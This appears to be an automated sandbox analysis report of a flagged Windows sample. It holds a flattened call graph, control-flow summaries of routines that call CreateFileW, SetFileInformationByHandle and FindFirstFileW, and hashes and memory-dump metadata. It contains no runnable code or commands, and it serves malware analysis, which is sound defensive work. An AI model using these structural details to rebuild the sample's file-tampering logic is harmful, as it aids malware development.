b4e7c 5866->5879 5867 b5140 5868 b515f 5867->5868 5870 b3d10 GetPEB 5867->5870 5869 b5187 5868->5869 5875 b3d10 GetPEB 5868->5875 5869->5536 5871 b5153 5870->5871 5874 b3c70 GetPEB 5871->5874 5872 b3d10 GetPEB 5872->5879 5874->5868 5877 b517b 5875->5877 5878 b3c70 GetPEB 5877->5878 5878->5869 5879->5867 5879->5869 5879->5872 5880 b3c70 GetPEB 5879->5880 5881 b4030 5879->5881 5891 b40d0 5879->5891 5880->5879 5882 b403d 5881->5882 5885 b4053 5881->5885 5883 b3d10 GetPEB 5882->5883 5884 b4047 5883->5884 5886 b3c70 GetPEB 5884->5886 5887 b407b 5885->5887 5888 b3d10 GetPEB 5885->5888 5886->5885 5887->5879 5889 b406f 5888->5889 5890 b3c70 GetPEB 5889->5890 5890->5887 5892 b40f3 5891->5892 5893 b40dd 5891->5893 5897 b4120 RtlAllocateHeap 5892->5897 5898 b3d10 GetPEB 5892->5898 5894 b3d10 GetPEB 5893->5894 5895 b40e7 5894->5895 5896 b3c70 GetPEB 5895->5896 5896->5892 5897->5879 5899 b410f 5898->5899 5900 b3c70 GetPEB 5899->5900 5901 b411b 5900->5901 5901->5897 5907 ba3ff 5902->5907 5904 b3d10 GetPEB 5904->5907 5905 ba441 5905->5548 5906 b3c70 GetPEB 5906->5907 5907->5904 5907->5905 5907->5906 5957 b4180 5907->5957 5914 ba5d5 5908->5914 5909 ba819 5909->5548 5910 ba8ca 5911 ba8e9 5910->5911 5912 b3d10 GetPEB 5910->5912 5920 b3d10 GetPEB 5911->5920 5923 ba911 5911->5923 5916 ba8dd 5912->5916 5914->5909 5914->5910 5921 b3d10 GetPEB 5914->5921 5925 b3c70 GetPEB 5914->5925 5926 b4580 2 API calls 5914->5926 5982 baad0 5914->5982 5993 b4660 5914->5993 6002 b4990 5914->6002 6024 b47c0 5914->6024 5917 b3c70 GetPEB 5916->5917 5917->5911 5922 ba905 5920->5922 5921->5914 5924 b3c70 GetPEB 5922->5924 5923->5548 5924->5923 5925->5914 5926->5914 5930 b9fa9 5927->5930 5928 ba33b 5928->5548 5929 b3d10 GetPEB 5929->5930 5930->5928 5930->5929 5931 b3270 GetPEB 5930->5931 5932 b4990 2 API calls 5930->5932 5934 ba3b5 5930->5934 5935 b4030 GetPEB 5930->5935 5938 baad0 GetPEB 5930->5938 5940 b3c70 GetPEB 5930->5940 6034 b1150 5930->6034 6043 bb250 5930->6043 5931->5930 5932->5930 5937 b4030 GetPEB 5934->5937 5935->5930 5939 ba3ba 5937->5939 5938->5930 5939->5548 5940->5930 5942 ba966 5941->5942 5943 ba98c 5942->5943 5944 baa4e 5942->5944 5945 baad0 GetPEB 5942->5945 5946 b4990 2 API calls 5942->5946 5947 b3d10 GetPEB 5942->5947 5953 b3c70 GetPEB 5942->5953 5943->5548 5948 b3d10 GetPEB 5944->5948 5952 baa6d 5944->5952 5945->5942 5946->5942 5947->5942 5949 baa61 5948->5949 5950 b3c70 GetPEB 5949->5950 5950->5952 5951 baa95 5951->5548 5952->5951 5954 b3d10 GetPEB 5952->5954 5953->5942 5955 baa89 5954->5955 5956 b3c70 GetPEB 5955->5956 5956->5951 5958 b431e 5957->5958 5959 b4194 5957->5959 5958->5907 5959->5958 5960 b3d10 GetPEB 5959->5960 5963 b41e6 5959->5963 5961 b41da 5960->5961 5962 b3c70 GetPEB 5961->5962 5962->5963 5964 b3d10 GetPEB 5963->5964 5971 b4246 5963->5971 5976 b4304 5963->5976 5965 b423a 5964->5965 5966 b3c70 GetPEB 5965->5966 5966->5971 5967 b42ca 5977 b4360 5967->5977 5969 b3d10 GetPEB 5969->5971 5971->5967 5971->5969 5972 b3c70 GetPEB 5971->5972 5972->5971 5973 b3d10 GetPEB 5974 b42f8 5973->5974 5975 b3c70 GetPEB 5974->5975 5975->5976 5976->5907 5978 b42e0 5977->5978 5979 b437b 5977->5979 5978->5973 5978->5976 5979->5978 5980 b3d10 GetPEB 5979->5980 5981 b3c70 GetPEB 5979->5981 5980->5979 5981->5979 5991 baaf3 5982->5991 5983 bad43 5984 b3d10 GetPEB 5983->5984 5985 baced 5983->5985 5987 bad56 5984->5987 5985->5914 5986 b3d10 GetPEB 5986->5991 5989 b3c70 GetPEB 5987->5989 5988 b3270 GetPEB 5988->5991 5989->5985 5990 b3c70 GetPEB 5990->5991 5991->5983 5991->5985 5991->5986 5991->5988 5991->5990 5992 b3210 GetPEB 5991->5992 5992->5991 5997 b4680 5993->5997 5994 b4782 5995 b477a 5994->5995 5996 b3d10 GetPEB 5994->5996 5995->5914 5998 b4795 5996->5998 5997->5994 5997->5995 5999 b3d10 GetPEB 5997->5999 6001 b3c70 GetPEB 5997->6001 6000 b3c70 GetPEB 5998->6000 5999->5997 6000->5995 6001->5997 6003 b49b8 6002->6003 6004 b49a2 6002->6004 6008 b49f7 CreateProcessW 6003->6008 6010 b3d10 GetPEB 6003->6010 6005 b3d10 GetPEB 6004->6005 6006 b49ac 6005->6006 6007 b3c70 GetPEB 6006->6007 6007->6003 6009 b4a93 6008->6009 6013 b4a17 6008->6013 6009->5914 6012 b49e6 6010->6012 6011 b4a1f 6011->5914 6014 b3c70 GetPEB 6012->6014 6013->6011 6015 b3d10 GetPEB 6013->6015 6018 b4a53 6013->6018 6016 b49f2 6014->6016 6017 b4a47 6015->6017 6016->6008 6019 b3c70 GetPEB 6017->6019 6020 b4a7d 6018->6020 6021 b3d10 GetPEB 6018->6021 6019->6018 6020->5914 6022 b4a71 6021->6022 6023 b3c70 GetPEB 6022->6023 6023->6020 6030 b47e0 6024->6030 6025 b495b 6026 b4951 6025->6026 6027 b3d10 GetPEB 6025->6027 6026->5914 6028 b496e 6027->6028 6029 b3c70 GetPEB 6028->6029 6029->6026 6030->6025 6030->6026 6031 b3270 GetPEB 6030->6031 6032 b3d10 GetPEB 6030->6032 6033 b3c70 GetPEB 6030->6033 6031->6030 6032->6030 6033->6030 6042 b1160 6034->6042 6035 b124b 6035->5930 6036 b1253 6036->6035 6037 b3d10 GetPEB 6036->6037 6038 b1266 6037->6038 6041 b3c70 GetPEB 6038->6041 6039 b3c70 GetPEB 6039->6042 6040 b3d10 GetPEB 6040->6042 6041->6035 6042->6035 6042->6036 6042->6039 6042->6040 6047 bb263 6043->6047 6044 bb300 6045 bb2de 6044->6045 6046 b3d10 GetPEB 6044->6046 6045->5930 6048 bb322 6046->6048 6047->6044 6047->6045 6049 b40d0 2 API calls 6047->6049 6050 b3c70 GetPEB 6048->6050 6049->6047 6050->6045 6052 b5396 6051->6052 6053 b5478 6052->6053 6054 b5480 6052->6054 6055 b3d10 GetPEB 6052->6055 6058 b3c70 GetPEB 6052->6058 6053->5563 6054->6053 6056 b3d10 GetPEB 6054->6056 6055->6052 6057 b5493 6056->6057 6059 b3c70 GetPEB 6057->6059 6058->6052 6059->6053 6067 b4ac0 6060->6067 6061 b4bdb 6062 b4bb6 6061->6062 6063 b3d10 GetPEB 6061->6063 6062->5563 6065 b4bee 6063->6065 6064 b3d10 GetPEB 6064->6067 6068 b3c70 GetPEB 6065->6068 6066 b3c70 GetPEB 6066->6067 6067->6061 6067->6062 6067->6064 6067->6066 6068->6062 6071 b2480 6069->6071 6070 b24bc 6070->5587 6071->6070 6072 b279f 6071->6072 6073 b40d0 2 API calls 6071->6073 6074 b3d10 GetPEB 6071->6074 6077 b3c70 GetPEB 6071->6077 6075 b4030 GetPEB 6072->6075 6073->6071 6074->6071 6076 b27aa 6075->6076 6076->5587 6077->6071 6079 b44e7 6078->6079 6084 b44fd 6078->6084 6080 b3d10 GetPEB 6079->6080 6081 b44f1 6080->6081 6082 b3c70 GetPEB 6081->6082 6082->6084 6083 b4570 6083->5645 6084->6083 6085 b3d10 GetPEB 6084->6085 6087 b4531 6084->6087 6086 b4525 6085->6086 6089 b3c70 GetPEB 6086->6089 6088 b4562 6087->6088 6090 b3d10 GetPEB 6087->6090 6088->5645 6089->6087 6091 b4556 6090->6091 6092 b3c70 GetPEB 6091->6092 6092->6088 6094 b3394 6093->6094 6095 b3d10 GetPEB 6094->6095 6097 b33b9 6094->6097 6096 b33ad 6095->6096 6098 b3c70 GetPEB 6096->6098 6099 b3d10 GetPEB 6097->6099 6102 b33e1 6097->6102 6098->6097 6100 b33d5 6099->6100 6101 b3c70 GetPEB 6100->6101 6101->6102 6102->5683 6102->6102 6104 b52e6 6103->6104 6109 b52fc 6103->6109 6105 b3d10 GetPEB 6104->6105 6106 b52f0 6105->6106 6108 b3c70 GetPEB 6106->6108 6107 b5356 6107->5691 6107->5692 6108->6109 6109->6107 6110 b3d10 GetPEB 6109->6110 6111 b534a 6110->6111 6112 b3c70 GetPEB 6111->6112 6112->6107 6114 b3f82 6113->6114 6115 b3f90 6113->6115 6116 b3d10 GetPEB 6114->6116 6115->5717 6117 b3f87 6116->6117 6118 b3c70 GetPEB 6117->6118 6118->6115 6120 b1c74 6119->6120 6121 b1c5e 6119->6121 6125 b1cec 6120->6125 6126 b3d10 GetPEB 6120->6126 6122 b3d10 GetPEB 6121->6122 6123 b1c68 6122->6123 6124 b3c70 GetPEB 6123->6124 6124->6120 6129 b3d10 GetPEB 6125->6129 6131 b1d20 6125->6131 6127 b1ce0 6126->6127 6128 b3c70 GetPEB 6127->6128 6128->6125 6130 b1d14 6129->6130 6132 b3c70 GetPEB 6130->6132 6133 b4cc0 GetPEB 6131->6133 6132->6131 6134 b1d54 6133->6134 6134->5717 6136 b5a16 6135->6136 6137 b5a00 6135->6137 6141 b3d10 GetPEB 6136->6141 6145 b5a3e 6136->6145 6138 b3d10 GetPEB 6137->6138 6139 b5a0a 6138->6139 6140 b3c70 GetPEB 6139->6140 6140->6136 6142 b5a32 6141->6142 6143 b3c70 GetPEB 6142->6143 6143->6145 6144 b5ac2 6144->5717 6145->6144 6146 b5a89 6145->6146 6147 b3d10 GetPEB 6145->6147 6149 b5ab1 6146->6149 6151 b3d10 GetPEB 6146->6151 6148 b5a7d 6147->6148 6150 b3c70 GetPEB 6148->6150 6149->5717 6150->6146 6152 b5aa5 6151->6152 6153 b3c70 GetPEB 6152->6153 6153->6149 6155 b1dc3 6154->6155 6156 b1e64 6155->6156 6157 b1e4a 6155->6157 6159 b40d0 2 API calls 6155->6159 6156->6157 6158 b3d10 GetPEB 6156->6158 6157->5717 6160 b1e86 6158->6160 6159->6155 6161 b3c70 GetPEB 6160->6161 6161->6157 6168 b1ec2 6162->6168 6163 b2070 6163->5717 6164 b3d10 GetPEB 6164->6168 6165 b210d 6165->6163 6167 b4030 GetPEB 6165->6167 6166 b40d0 2 API calls 6166->6168 6167->6163 6168->6163 6168->6164 6168->6165 6168->6166 6169 b3c70 GetPEB 6168->6169 6169->6168 6177 b2151 6170->6177 6171 b21a0 6171->5717 6172 b3d10 GetPEB 6172->6177 6173 b2445 6175 b2458 6173->6175 6178 b4030 GetPEB 6173->6178 6174 b3c70 GetPEB 6174->6177 6175->5717 6176 b40d0 2 API calls 6176->6177 6177->6171 6177->6172 6177->6173 6177->6174 6177->6176 6178->6175 6187 b2a6a 6179->6187 6180 b2dcb 6182 b3d10 GetPEB 6180->6182 6190 b2dea 6180->6190 6186 b2dde 6182->6186 6183 b2c09 6183->5717 6184 b3d10 GetPEB 6184->6187 6185 b40d0 2 API calls 6185->6187 6188 b3c70 GetPEB 6186->6188 6187->6180 6187->6183 6187->6184 6187->6185 6189 b3270 GetPEB 6187->6189 6191 b4030 GetPEB 6187->6191 6192 b3c70 GetPEB 6187->6192 6193 b3210 GetPEB 6187->6193 6223 b54d0 6187->6223 6232 b27c0 6187->6232 6188->6190 6189->6187 6190->5717 6191->6187 6192->6187 6193->6187 6216 b18df 6195->6216 6196 b1b3e 6197 b3370 GetPEB 6196->6197 6199 b1b48 6197->6199 6198 b1aef 6198->5717 6200 b1b69 6199->6200 6201 b3d10 GetPEB 6199->6201 6206 b1b9b 6200->6206 6207 b3d10 GetPEB 6200->6207 6203 b1b5d 6201->6203 6202 b3c70 GetPEB 6202->6216 6205 b3c70 GetPEB 6203->6205 6204 b3d10 GetPEB 6204->6216 6205->6200 6210 b1bc3 6206->6210 6212 b3d10 GetPEB 6206->6212 6209 b1b8f 6207->6209 6208 b4c50 GetPEB 6208->6216 6211 b3c70 GetPEB 6209->6211 6210->5717 6211->6206 6213 b1bb7 6212->6213 6214 b3c70 GetPEB 6213->6214 6214->6210 6215 b3370 GetPEB 6215->6216 6216->6196 6216->6198 6216->6202 6216->6204 6216->6208 6216->6215 6217 b3210 GetPEB 6216->6217 6217->6216 6221 b4cd6 6218->6221 6219 b4d5d 6219->5717 6220 b3d10 GetPEB 6220->6221 6221->6219 6221->6220 6222 b3c70 GetPEB 6221->6222 6222->6221 6230 b54e1 6223->6230 6224 b55c4 6224->6187 6225 b3d10 GetPEB 6225->6230 6226 b55cb 6226->6224 6227 b3d10 GetPEB 6226->6227 6228 b55de 6227->6228 6229 b3c70 GetPEB 6228->6229 6229->6224 6230->6224 6230->6225 6230->6226 6231 b3c70 GetPEB 6230->6231 6231->6230 6234 b27e0 6232->6234 6233 b2905 6236 b3d10 GetPEB 6233->6236 6238 b292a 6233->6238 6240 b2952 6233->6240 6234->6233 6235 b3d10 GetPEB 6234->6235 6241 b3c70 GetPEB 6234->6241 6235->6234 6237 b291e 6236->6237 6239 b3c70 GetPEB 6237->6239 6238->6240 6242 b3d10 GetPEB 6238->6242 6239->6238 6240->6187 6241->6234 6243 b2946 6242->6243 6244 b3c70 GetPEB 6243->6244 6244->6240 6253 b1010 6245->6253 6246 b1109 6247 b1101 6246->6247 6249 b3d10 GetPEB 6246->6249 6247->5755 6248 b3d10 GetPEB 6248->6253 6250 b111c 6249->6250 6251 b3c70 GetPEB 6250->6251 6251->6247 6252 b3c70 GetPEB 6252->6253 6253->6246 6253->6247 6253->6248 6253->6252 6255 b74d0 6254->6255 6256 b75e0 6255->6256 6257 b7560 6255->6257 6260 b3270 GetPEB 6255->6260 6262 b3d10 GetPEB 6255->6262 6264 b3c70 GetPEB 6255->6264 6265 b3210 GetPEB 6255->6265 6258 b3d10 GetPEB 6256->6258 6261 b75ff 6256->6261 6257->5764 6259 b75f3 6258->6259 6263 b3c70 GetPEB 6259->6263 6260->6255 6261->5764 6262->6255 6263->6261 6264->6255 6265->6255 6301 b4c10 GetPEB 6302 b9990 6311 b99b0 6302->6311 6303 b9bf0 GetPEB 6303->6311 6304 b3d10 GetPEB 6304->6311 6305 b9bba 6307 b99e5 6305->6307 6308 b3d10 GetPEB 6305->6308 6306 b3c70 GetPEB 6306->6311 6309 b9bcd 6308->6309 6310 b3c70 GetPEB 6309->6310 6310->6307 6311->6303 6311->6304 6311->6305 6311->6306 6311->6307 6318 b29d0 6319 b29e9 6318->6319 6323 b29ff 6318->6323 6320 b3d10 GetPEB 6319->6320 6321 b29f3 6320->6321 6322 b3c70 GetPEB 6321->6322 6322->6323 6324 b6250 6325 b625a 6324->6325 6330 b6270 6324->6330 6326 b3d10 GetPEB 6325->6326 6327 b6264 6326->6327 6328 b3c70 GetPEB 6327->6328 6328->6330 6329 b62f9 6330->6329 6331 b40d0 2 API calls 6330->6331 6332 b62da 6331->6332 6332->6329 6333 b3f70 GetPEB 6332->6333 6333->6329 6334 b2157 6341 b2151 6334->6341 6335 b21a0 6336 b3d10 GetPEB 6336->6341 6337 b2445 6339 b2458 6337->6339 6342 b4030 GetPEB 6337->6342 6338 b3c70 GetPEB 6338->6341 6340 b40d0 2 API calls 6340->6341 6341->6335 6341->6336 6341->6337 6341->6338 6341->6340 6342->6339 6343 b5fa8 6348 b5fa2 6343->6348 6344 b4aa0 GetPEB 6344->6348 6345 b6137 6346 b623b 6347 b5380 GetPEB 6347->6348 6348->6344 6348->6345 6348->6347 6349 b4030 GetPEB 6348->6349 6351 b3d10 GetPEB 6348->6351 6353 b3c70 GetPEB 6348->6353 6354 b61d1 6348->6354 6349->6348 6350 b3d10 GetPEB 6350->6354 6351->6348 6352 b3c70 GetPEB 6352->6354 6353->6348 6354->6346 6354->6350 6354->6352 6365 b6368 6407 b6361 6365->6407 6366 b9440 4 API calls 6366->6407 6367 b12b0 2 API calls 6367->6407 6368 b7e50 4 API calls 6368->6407 6369 b6722 6370 b51a0 GetPEB 6370->6407 6371 b8a10 2 API calls 6371->6407 6372 b9310 GetPEB 6372->6407 6373 b6e5d 6382 bb010 GetPEB 6373->6382 6374 b90b0 GetPEB 6374->6407 6375 b7200 GetPEB 6375->6407 6376 b6e43 6389 b85c0 GetPEB 6376->6389 6377 b69e9 GetTickCount 6377->6407 6378 b6e50 6390 b8ba0 2 API calls 6378->6390 6379 baf70 2 API calls 6379->6407 6380 b30c0 GetPEB 6380->6407 6381 b8cd0 GetPEB 6381->6407 6382->6369 6383 b8e90 GetPEB 6383->6407 6384 b5e00 GetPEB 6384->6407 6385 b5f80 GetPEB 6385->6407 6386 b6f10 3 API calls 6386->6407 6387 b6bb9 GetTickCount 6387->6407 6388 b70c0 GetPEB 6388->6407 6400 b6e48 6389->6400 6401 b6e55 6390->6401 6391 b4030 GetPEB 6391->6407 6392 b8210 2 API calls 6392->6407 6393 b4580 2 API calls 6393->6407 6394 bad80 GetPEB 6394->6407 6395 b87e0 2 API calls 6395->6407 6396 bb160 4 API calls 6396->6407 6397 b3d10 GetPEB 6397->6407 6398 b9d50 GetPEB 6398->6407 6399 b1800 2 API calls 6399->6407 6402 b3f70 GetPEB 6402->6407 6403 b9680 6 API calls 6403->6407 6404 b3210 GetPEB 6404->6407 6405 b9e90 GetPEB 6405->6407 6406 b3c70 GetPEB 6406->6407 6407->6366 6407->6367 6407->6368 6407->6369 6407->6370 6407->6371 6407->6372 6407->6373 6407->6374 6407->6375 6407->6376 6407->6377 6407->6378 6407->6379 6407->6380 6407->6381 6407->6383 6407->6384 6407->6385 6407->6386 6407->6387 6407->6388 6407->6391 6407->6392 6407->6393 6407->6394 6407->6395 6407->6396 6407->6397 6407->6398 6407->6399 6407->6402 6407->6403 6407->6404 6407->6405 6407->6406 6408 b18e8 6429 b18df 6408->6429 6409 b1b3e 6410 b3370 GetPEB 6409->6410 6412 b1b48 6410->6412 6411 b1aef 6413 b3d10 GetPEB 6412->6413 6417 b1b69 6412->6417 6414 b1b5d 6413->6414 6415 b3c70 GetPEB 6414->6415 6415->6417 6416 b1b9b 6422 b1bc3 6416->6422 6424 b3d10 GetPEB 6416->6424 6417->6416 6418 b3d10 GetPEB 6417->6418 6421 b1b8f 6418->6421 6419 b4c50 GetPEB 6419->6429 6420 b3c70 GetPEB 6420->6429 6423 b3c70 GetPEB 6421->6423 6423->6416 6426 b1bb7 6424->6426 6425 b3d10 GetPEB 6425->6429 6427 b3c70 GetPEB 6426->6427 6427->6422 6428 b3370 GetPEB 6428->6429 6429->6409 6429->6411 6429->6419 6429->6420 6429->6425 6429->6428 6430 b3210 GetPEB 6429->6430 6430->6429 5413 b2ea0 5420 b2eba 5413->5420 5414 b305a 5416 b3d10 GetPEB 5414->5416 5421 b2ef1 5414->5421 5415 b3d10 GetPEB 5415->5420 5418 b306e 5416->5418 5417 b2f5b RtlAllocateHeap 5417->5420 5417->5421 5419 b3c70 GetPEB 5418->5419 5419->5421 5420->5414 5420->5415 5420->5417 5420->5421 5422 b3c70 GetPEB 5420->5422 5422->5420 6431 b7620 6440 b7780 6431->6440 6432 b79b1 6434 b3d10 GetPEB 6432->6434 6437 b79d0 6432->6437 6433 b3270 GetPEB 6433->6440 6436 b79c4 6434->6436 6435 b7988 6438 b3c70 GetPEB 6436->6438 6438->6437 6439 b3d10 GetPEB 6439->6440 6440->6432 6440->6433 6440->6435 6440->6439 6441 b3c70 GetPEB 6440->6441 6442 b3210 GetPEB 6440->6442 6441->6440 6442->6440 6449 b7d60 6450 b3270 GetPEB 6449->6450 6451 b7d72 6450->6451 6452 b7d93 6451->6452 6453 b3d10 GetPEB 6451->6453 6455 b7dd9 6452->6455 6457 b3d10 GetPEB 6452->6457 6454 b7d87 6453->6454 6456 b3c70 GetPEB 6454->6456 6460 b7e01 6455->6460 6461 b3d10 GetPEB 6455->6461 6456->6452 6458 b7dcd 6457->6458 6459 b3c70 GetPEB 6458->6459 6459->6455 6464 b3d10 GetPEB 6460->6464 6467 b7e2d 6460->6467 6462 b7df5 6461->6462 6463 b3c70 GetPEB 6462->6463 6463->6460 6465 b7e21 6464->6465 6466 b3c70 GetPEB 6465->6466 6466->6467 6468 b4679 6473 b4680 6468->6473 6469 b4782 6470 b477a 6469->6470 6471 b3d10 GetPEB 6469->6471 6472 b4795 6471->6472 6476 b3c70 GetPEB 6472->6476 6473->6469 6473->6470 6474 b3c70 GetPEB 6473->6474 6475 b3d10 GetPEB 6473->6475 6474->6473 6475->6473 6476->6470 6486 b45f0 6487 b4aa0 GetPEB 6486->6487 6488 b4605 6487->6488 6495 baeb0 6496 baec4 6495->6496 6497 b5e00 GetPEB 6496->6497 6505 baf4a 6496->6505 6498 baed6 6497->6498 6499 b30c0 GetPEB 6498->6499 6500 baeec 6499->6500 6501 baf22 6500->6501 6502 b3d10 GetPEB 6500->6502 6501->6505 6506 b3d10 GetPEB 6501->6506 6503 baf16 6502->6503 6504 b3c70 GetPEB 6503->6504 6504->6501 6507 baf3e 6506->6507 6508 b3c70 GetPEB 6507->6508 6508->6505

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 81 b7e50-b7f60 82 b7f68-b7f6d 81->82 83 b7f70-b7f76 82->83 84 b80cb-b80d1 83->84 85 b7f7c 83->85 86 b8160-b8197 84->86 87 b80d7-b80dd 84->87 88 b801f-b8033 call b3270 85->88 89 b7f82-b7f88 85->89 90 b8199-b81af call b3d10 call b3c70 86->90 91 b81b4-b81ca SetFileInformationByHandle 86->91 92 b80df-b80e5 87->92 93 b8104-b810c 87->93 116 b8053-b8076 88->116 117 b8035-b804d call b3d10 call b3c70 88->117 95 b7fea-b7ff1 89->95 96 b7f8a-b7f90 89->96 90->91 91->83 100 b80eb-b80f1 92->100 101 b81cf-b81d6 92->101 102 b810e-b8126 call b3d10 call b3c70 93->102 103 b812c-b8150 CreateFileW 93->103 97 b800e-b801a 95->97 98 b7ff3-b8009 call b3d10 call b3c70 95->98 105 b7f92-b7f98 96->105 106 b7fa5-b7fe8 call bb3e0 96->106 97->83 98->97 100->83 112 b80f7-b8103 100->112 113 b81d8-b81ee call b3d10 call b3c70 101->113 114 b81f3-b81f4 CloseHandle 101->114 102->103 108 b81f6-b8202 103->108 109 b8156-b815b 103->109 105->100 118 b7f9e-b7fa3 105->118 106->83 109->83 113->114 114->108 134 b8078-b808e call b3d10 call b3c70 116->134 135 b8093-b809e 116->135 117->116 118->83 134->135 144 b80bb-b80c6 135->144 145 b80a0-b80b6 call b3d10 call b3c70 135->145 144->82 145->144
                                              APIs
                                              • CreateFileW.KERNELBASE(?,?,?,00000000,00C42D80,F99B4000,00000000), ref: 000B8149
                                              • SetFileInformationByHandle.KERNELBASE(133C7E34,00000000,?,00000028), ref: 000B81BE
                                              • CloseHandle.KERNELBASE(133C7E34), ref: 000B81F4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2041830333.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                              • Associated: 00000000.00000002.2041722614.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2041891611.00000000000BD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2041908928.00000000000BF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b0000_75A0VTo3z9.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileHandle$CloseCreateInformation
                                              • String ID: )V$;c
                                              • API String ID: 1240749428-869850096
                                              • Opcode ID: 6485c3165368e5a1492f70bd0a337bd87ec558e397db5da8ddcb296c9bf64f93
                                              • Instruction ID: ca9cacc5f276afcc2959b7bbfe865bc042362a4558b684091480bcef626995c7
                                              • Opcode Fuzzy Hash: 6485c3165368e5a1492f70bd0a337bd87ec558e397db5da8ddcb296c9bf64f93
                                              • Instruction Fuzzy Hash: 2791AA706083418FD358EF68D8956ABB7E4EBC4344F10492DF4969B2A1EB74CE49CF92

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 152 b8210-b8339 153 b8341-b8347 152->153 154 b834d 153->154 155 b8474-b847a 153->155 158 b8418-b8420 154->158 159 b8353-b8359 154->159 156 b8480-b8486 155->156 157 b8506-b850d 155->157 160 b8488-b848f 156->160 161 b84ef-b84f5 156->161 162 b852a-b853d 157->162 163 b850f-b8525 call b3d10 call b3c70 157->163 166 b8422-b843a call b3d10 call b3c70 158->166 167 b8440-b8464 CreateFileW 158->167 164 b835f-b8365 159->164 165 b83e3-b83ea 159->165 173 b84ac-b84cf 160->173 174 b8491-b84a7 call b3d10 call b3c70 160->174 161->153 169 b84fb-b8505 161->169 162->153 163->162 176 b83d9-b83de 164->176 177 b8367-b836d 164->177 171 b83ec-b8402 call b3d10 call b3c70 165->171 172 b8407-b8413 165->172 166->167 167->169 170 b846a-b846f 167->170 170->153 171->172 172->153 192 b84ec 173->192 193 b84d1-b84e7 call b3d10 call b3c70 173->193 174->173 176->153 177->161 183 b8373-b83bb call bb3e0 177->183 183->169 198 b83c1 183->198 192->161 193->192 202 b83cb-b83d8 198->202 203 b83c3-b83c5 198->203 203->169 203->202
                                              APIs
                                              • CreateFileW.KERNELBASE(?,?,?,00000000,?,F99B4000,00000000), ref: 000B845D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2041830333.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                              • Associated: 00000000.00000002.2041722614.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2041891611.00000000000BD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2041908928.00000000000BF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b0000_75A0VTo3z9.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID: )V$;c$GY.$GY.
                                              • API String ID: 823142352-4287404121
                                              • Opcode ID: a797d7402678bd84fec192c15533818ea95d2e508fbe79cda9b30b1b56b88285
                                              • Instruction ID: a11e7f12a0ebb77b8e2c8d0a5ca5e3c702edfa36deffeeefca3059913805358a
                                              • Opcode Fuzzy Hash: a797d7402678bd84fec192c15533818ea95d2e508fbe79cda9b30b1b56b88285
                                              • Instruction Fuzzy Hash: F271AD716083428BD754DF68C4856AFB7E4BBD4714F00891DF4A5AB2A0EBB4DE09CB82

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 207 b36a0-b36bb 208 b36c0-b36c5 207->208 209 b36cb 208->209 210 b381c-b3821 208->210 213 b36d1-b36d6 209->213 214 b3775-b3788 call b3270 209->214 211 b3823-b3828 210->211 212 b3844-b3849 210->212 215 b396f-b3976 211->215 216 b382e-b3833 211->216 219 b3949-b396a 212->219 220 b384f-b3855 212->220 217 b36d8-b36dd 213->217 218 b372d-b3734 213->218 240 b378a-b37a0 call b3d10 call b3c70 214->240 241 b37a5-b37c3 214->241 228 b3978-b398e call b3d10 call b3c70 215->228 229 b3993-b3994 FindClose 215->229 216->208 222 b3839-b3843 216->222 223 b36df-b36e4 217->223 224 b36f1-b36f8 217->224 230 b3751-b3765 FindFirstFileW 218->230 231 b3736-b374c call b3d10 call b3c70 218->231 219->208 225 b3879-b387b 220->225 226 b3857-b385f 220->226 223->216 235 b36ea-b36ef 223->235 236 b36fa-b3710 call b3d10 call b3c70 224->236 237 b3715-b372b FindNextFileW 224->237 242 b393f-b3944 225->242 243 b3881-b3894 call b3270 225->243 238 b386f-b3874 226->238 239 b3861-b3865 226->239 228->229 233 b3996-b39a0 229->233 230->233 234 b376b-b3770 230->234 231->230 234->208 235->208 236->237 237->208 238->208 239->225 249 b3867-b386d 239->249 240->241 258 b37e0-b37eb 241->258 259 b37c5-b37db call b3d10 call b3c70 241->259 242->208 264 b38b1-b38e1 call b36a0 243->264 265 b3896-b38ac call b3d10 call b3c70 243->265 249->225 249->238 277 b3808-b3817 258->277 278 b37ed-b3803 call b3d10 call b3c70 258->278 259->258 281 b38e6-b38f0 264->281 265->264 277->208 278->277 284 b390d-b3918 281->284 285 b38f2-b3908 call b3d10 call b3c70 281->285 293 b391a-b3930 call b3d10 call b3c70 284->293 294 b3935-b393b 284->294 285->284 293->294 294->242
                                              APIs
                                              • FindNextFileW.KERNELBASE(?,00000010), ref: 000B371B
                                              • FindFirstFileW.KERNELBASE(?,00000010), ref: 000B375E
                                              • FindClose.KERNELBASE(?,?,?,00000001,00000000), ref: 000B3994
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2041830333.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                              • Associated: 00000000.00000002.2041722614.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2041891611.00000000000BD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2041908928.00000000000BF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b0000_75A0VTo3z9.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$File$CloseFirstNext
                                              • String ID: .
                                              • API String ID: 3541575487-248832578
